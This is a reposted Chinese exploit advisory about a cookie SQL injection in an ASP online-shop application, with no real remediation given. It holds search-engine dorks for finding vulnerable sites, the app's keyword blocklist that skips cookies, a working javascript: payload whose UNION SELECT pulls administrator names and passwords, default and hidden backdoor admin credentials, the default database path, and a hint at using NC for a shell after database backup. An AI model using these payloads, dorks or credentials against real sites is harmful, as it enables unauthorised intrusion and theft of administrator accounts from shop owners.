网站地图    收藏   

主页 > 后端 > 网站安全 >

asp网上商城cookies注入漏洞及修复 - 网站安全 - 自

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] ############################################################################## Title: asp网上商城cookies注入漏洞# Time:2011-09-25# Team:makebugs# Author: 晴天小铸###########################......

############################################################################
#
#  Title: asp网上商城cookies注入漏洞

#  Time:2011-09-25

#  Team:makebugs

#  Author: 晴天小铸
############################################################################

PS:帮忙踩踩~!

关键字: inurl:sort.asp?sort_id=
或者 inurl:pinpai.asp?pinpai_id=

‘表单数据初步判断,检验攻击语句
Code:
Form_Badword=”%20or%20|’|”"|%|update|select|delete|insert|java|script|exec|cmd|shell|count|mid|char|drop|master|from|net%20user|/add|iframe”
if request.form<>”" and uBits =”" then
Chk_badword=split(Form_Badword,”|”)
FOR EACH name IN Request.Form
for i=0 to ubound(Chk_badword)
If Instr(LCase(request.form(name)),Chk_badword(i))<>0 Then
showerr “e”
End If
NEXT
NEXT
end if

‘参数初步判断,检验攻击语句
Query_Badword=”%20or%20|’|”"|%|update|=|select|delete|insert|java|script|exec|cmd|shell|count|mid|char|drop|master|from|net%20user|/add|iframe”
if request.QueryString<>”" then
Chk_badword=split(Query_Badword,”|”)
FOR EACH Query_Name IN Request.QueryString
for i=0 to ubound(Chk_badword)
If Instr(LCase(request.QueryString(Query_Name)),Chk_badword(i))<>0 Then
showerr “e”
End If
NEXT
NEXT
End if

http://www.2cto.com /sort.asp?sort_id=1

//没检测cookies你懂的

Exp:
javascript:alert(document.cookie=”sort_id=”+escape(“1 and 1=2 union select 1,admin_name,admin_pass,4,5,6,7 from ad_admin”))

后台数据库可以备份你懂的~!!!!!
需要NC 调用 不懂参考http://www.2cto.com/Article/201106/92845.html

默认管理账户密码 admin admin888

还有个隐藏账户    swit     xuxinyao999
后门?

默认数据库地址 Database/shopdata.mdb

修复:老问题了

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论